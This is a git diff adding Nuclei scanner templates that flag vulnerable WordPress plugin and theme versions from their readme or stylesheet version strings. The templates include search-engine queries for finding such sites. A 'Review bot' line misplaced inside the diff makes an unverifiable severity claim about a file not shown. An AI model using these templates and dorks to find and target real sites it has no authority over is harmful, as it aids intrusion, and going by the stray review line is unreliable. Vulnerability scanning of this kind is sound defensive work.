+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gaga-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.2')
\ No newline at end of file
diff --git a/poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml b/poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml
new file mode 100644
index 0000000000..fb86295157
--- /dev/null
+++ b/poc/other/grip-f2a32ddf27d02f7ada6388e3c4206c80.yaml
@@ -0,0 +1,59 @@
+id: grip-f2a32ddf27d02f7ada6388e3c4206c80
+
+info:
+ name: >
+ Multiple Themes - Authenticated (Subscriber+) Arbitrary Plugin Activation and Deactivation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b086aec-3af4-4498-bb7d-dd6f6d264be7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/grip/"
+ google-query: inurl:"/wp-content/themes/grip/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,grip,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/grip/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "grip"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml b/poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml
new file mode 100644
index 0000000000..2a13127149
--- /dev/null
+++ b/poc/other/one-paze-f2a32ddf27d02f7ada6388e3c4206c80.yaml
@@ -0,0 +1,59 @@
+id: one-paze-f2a32ddf27d02f7ada6388e3c4206c80
+
+info:
+ name: >
+ Multiple Themes - Authenticated (Subscriber+) Arbitrary Plugin Activation and Deactivation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b086aec-3af4-4498-bb7d-dd6f6d264be7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/one-paze/"
+ google-query: inurl:"/wp-content/themes/one-paze/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,one-paze,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/one-paze/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "one-paze"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.8')
\ No newline at end of file
diff --git a/poc/other/philantro.yaml b/poc/other/philantro.yaml
new file mode 100644
index 0000000000..3667c884e4
--- /dev/null
+++ b/poc/other/philantro.yaml
@@ -0,0 +1,59 @@
+id: philantro-29c5a7b9291bcb9f2b3f30ab18228044
+
+info:
+ name: >
+ Philantro – Donations and Donor Management <= 5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/philantro/"
+ google-query: inurl:"/wp-content/plugins/philantro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,philantro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/philantro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "philantro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.2')
\ No newline at end of file
diff --git a/poc/other/scancircle.yaml b/poc/other/scancircle.yaml
new file mode 100644
index 0000000000..271eb07598
--- /dev/null
+++ b/poc/other/scancircle.yaml
@@ -0,0 +1,59 @@
+id: scancircle-7ee90db200c7a437ce72480a93db9e3d
+
+info:
+ name: >
+ ScanCircle <= 2.9.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/27cc6931-086c-43a5-965b-2a19f15bb356?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/scancircle/"
+ google-query: inurl:"/wp-content/plugins/scancircle/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,scancircle,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/scancircle/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "scancircle"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.9.2')
\ No newline at end of file
diff --git a/poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml b/poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml
new file mode 100644
index 0000000000..ff65432b43
--- /dev/null
+++ b/poc/other/simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc.yaml
@@ -0,0 +1,59 @@
+id: simple-notification-afa7d78fbc3bbde326d4d78b8152b4bc
+
+info:
+ name: >
+ Simple Notification <= 1.3 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8d6637f7-7035-4355-9c9d-193ea87c6e62?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-notification/"
+ google-query: inurl:"/wp-content/plugins/simple-notification/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-notification,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-notification"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml b/poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml
new file mode 100644
index 0000000000..1949ca06af
--- /dev/null
+++ b/poc/other/simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a.yaml
@@ -0,0 +1,59 @@
+id: simple-notification-fdd7ff26d7f63a7b2fa52cbfdc17c04a
+
+info:
+ name: >
+ Simple Notification <= 1.3 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/191521ba-817e-4a7f-99df-3fe9cc1c5de3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-notification/"
+ google-query: inurl:"/wp-content/plugins/simple-notification/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-notification,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-notification/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-notification"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3')
\ No newline at end of file
diff --git a/poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml b/poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml
new file mode 100644
index 0000000000..111e0e9e64
--- /dev/null
+++ b/poc/other/so-widgets-bundle-180c430fc45a724a110d6335d32e96f4.yaml
@@ -0,0 +1,59 @@
+id: so-widgets-bundle-180c430fc45a724a110d6335d32e96f4
+
+info:
+ name: >
+ SiteOrigin Widgets Bundle <= 1.64.0 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6864382e-7a45-413c-a80e-a5dd827fe6c7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/so-widgets-bundle/"
+ google-query: inurl:"/wp-content/plugins/so-widgets-bundle/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,so-widgets-bundle,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "so-widgets-bundle"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.64.0')
\ No newline at end of file
diff --git a/poc/other/taeggie-feed.yaml b/poc/other/taeggie-feed.yaml
new file mode 100644
index 0000000000..04ff43a1af
--- /dev/null
+++ b/poc/other/taeggie-feed.yaml
@@ -0,0 +1,59 @@
+id: taeggie-feed-008b75688d8ae4824127311c231e062f
+
+info:
+ name: >
+ Taeggie Feed <= 0.1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/65d11459-5cad-4d8b-a81d-7f0dd4342a52?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/taeggie-feed/"
+ google-query: inurl:"/wp-content/plugins/taeggie-feed/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,taeggie-feed,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/taeggie-feed/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "taeggie-feed"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.1.9')
\ No newline at end of file
diff --git a/poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml b/poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml
new file mode 100644
index 0000000000..aeddb2c8c8
--- /dev/null
+++ b/poc/other/tourmaster-a67429358d0ce99ecc6ba58dd169ed25.yaml
@@ -0,0 +1,59 @@
+id: tourmaster-a67429358d0ce99ecc6ba58dd169ed25
+
+info:
+ name: >
+ Tour Master - Tour Booking, Travel, Hotel < 5.3.4 - Unauthenticated Stored Cross-Site Scripting via Room Booking
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12b1b1b4-a62f-451e-a78d-c1d85202a4cf?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/tourmaster/"
+ google-query: inurl:"/wp-content/plugins/tourmaster/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,tourmaster,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tourmaster/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tourmaster"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '< 5.3.4')
\ No newline at end of file
diff --git a/poc/other/video-share-vod.yaml b/poc/other/video-share-vod.yaml
new file mode 100644
index 0000000000..13edfd5dc2
--- /dev/null
+++ b/poc/other/video-share-vod.yaml
@@ -0,0 +1,59 @@
+id: video-share-vod-3dfab9cfd6eeddeace596849813fffea
+
+info:
+ name: >
+ Video Share VOD – Turnkey Video Site Builder Script <= 2.6.30 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/video-share-vod/"
+ google-query: inurl:"/wp-content/plugins/video-share-vod/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,video-share-vod,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/video-share-vod/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "video-share-vod"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.30')
\ No newline at end of file
diff --git a/poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml b/poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml
new file mode 100644
index 0000000000..fced0d3f3a
--- /dev/null
+++ b/poc/other/virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7.yaml
@@ -0,0 +1,59 @@
+id: virtual-hdm-for-taxservice-am-b72e78d8893ace58a96e70e16ec3b4d7
+
+info:
+ name: >
+ TAX SERVICE Electronic HDM <= 1.1.2 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/970c7495-e43c-4606-8154-e2ac7d1c4816?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/virtual-hdm-for-taxservice-am/"
+ google-query: inurl:"/wp-content/plugins/virtual-hdm-for-taxservice-am/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,virtual-hdm-for-taxservice-am,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/virtual-hdm-for-taxservice-am/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "virtual-hdm-for-taxservice-am"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.2')
\ No newline at end of file
diff --git a/poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml b/poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml
new file mode 100644
index 0000000000..88a0a50372
--- /dev/null
+++ b/poc/other/wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae.yaml
@@ -0,0 +1,59 @@
+id: wedevs-project-manager-b583a50e24233331029e3cbee7dc09ae
+
+info:
+ name: >
+ WP Project Manager <= 2.6.15 - Authenticated (Subscriber+) Sensitive Information Exposure via Project Task List REST API
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a21b7c40-2090-4262-9105-346db2325612?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wedevs-project-manager/"
+ google-query: inurl:"/wp-content/plugins/wedevs-project-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wedevs-project-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wedevs-project-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wedevs-project-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.15')
\ No newline at end of file
diff --git a/poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml b/poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml
new file mode 100644
index 0000000000..3504b9427d
--- /dev/null
+++ b/poc/other/woffice-2b39d74568e88403e75df623ca0d523c.yaml
@@ -0,0 +1,59 @@
+id: woffice-2b39d74568e88403e75df623ca0d523c
+
+info:
+ name: >
+ Woffice <= 5.4.14 - Unauthenticated Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4c64089a-929c-4a36-8aa8-61a5c9e8562b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/woffice/"
+ google-query: inurl:"/wp-content/themes/woffice/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,woffice,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/woffice/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "woffice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.4.14')
\ No newline at end of file
diff --git a/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml
new file mode 100644
index 0000000000..9fe5b7e407
--- /dev/null
+++ b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5.yaml
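Review bot: `severity: low` here contradicts the second template this commit adds for the very same Wordfence advisory (4c64089a-929c-4a36-8aa8-61a5c9e8562b) under poc/sql/CVE-2024-43234-…, which rates the identical "Unauthenticated Privilege Escalation" title `critical` with a 9.8 score; the `low` is also copied into the last element of `tags`. Two templates keyed on one advisory with opposite severities will report conflicting findings for the same host, so the api-scan copy should either carry the CVE copy's rating or be dropped in favour of it. For this file that is `severity: critical` and `tags: cve,wordpress,wp-theme,woffice,critical`.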
@@ -0,0 +1,59 @@
+id: blaze-online-eparcel-for-woocommerce-028c8bf1a96949a8037d7ca57cb52eb5
+
+info:
+ name: >
+ Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/da58f0d5-1608-4c45-89a5-bc5bd358263e?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "blaze-online-eparcel-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml
new file mode 100644
index 0000000000..c91d8c117f
--- /dev/null
+++ b/poc/remote_code_execution/blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680.yaml
@@ -0,0 +1,59 @@
+id: blaze-online-eparcel-for-woocommerce-5a8844d4895daa0c0548d395338c8680
+
+info:
+ name: >
+ Blaze Online eParcel for WooCommerce <= 1.3.3 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/eeca3208-2cab-4c03-935f-8f657d7ca87f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/blaze-online-eparcel-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/blaze-online-eparcel-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,blaze-online-eparcel-for-woocommerce,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/blaze-online-eparcel-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "blaze-online-eparcel-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.3')
\ No newline at end of file
diff --git a/poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml b/poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml
new file mode 100644
index 0000000000..9f7b850e38
--- /dev/null
+++ b/poc/remote_code_execution/import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f.yaml
@@ -0,0 +1,59 @@
+id: import-export-for-woocommerce-bcf2ad7e63917a98b59c548c5519a59f
+
+info:
+ name: >
+ Import Export For WooCommerce <= 1.5 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/afb5b791-0bc7-466f-87f6-f6c5ebed576b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/import-export-for-woocommerce/"
+ google-query: inurl:"/wp-content/plugins/import-export-for-woocommerce/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,import-export-for-woocommerce,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/import-export-for-woocommerce/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "import-export-for-woocommerce"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml b/poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml
new file mode 100644
index 0000000000..f43546f837
--- /dev/null
+++ b/poc/sql/CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12121-28bd43332ba5567c247178a27dbbf56c
+
+info:
+ name: >
+ Broken Link Checker | Finder <= 2.5.0 - Authenticated (Author+) Blind Server-Side Request Forgery
+ author: topscoder
+ severity: low
+ description: >
+ The Broken Link Checker | Finder plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 2.5.0 via the 'moblc_check_link' function. This makes it possible for authenticated attackers, with Author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa52034e-3d11-4be5-ab8b-8f7256be2a3e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-12121
+ metadata:
+ fofa-query: "wp-content/plugins/broken-link-finder/"
+ google-query: inurl:"/wp-content/plugins/broken-link-finder/"
+ shodan-query: 'vuln:CVE-2024-12121'
+ tags: cve,wordpress,wp-plugin,broken-link-finder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/broken-link-finder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
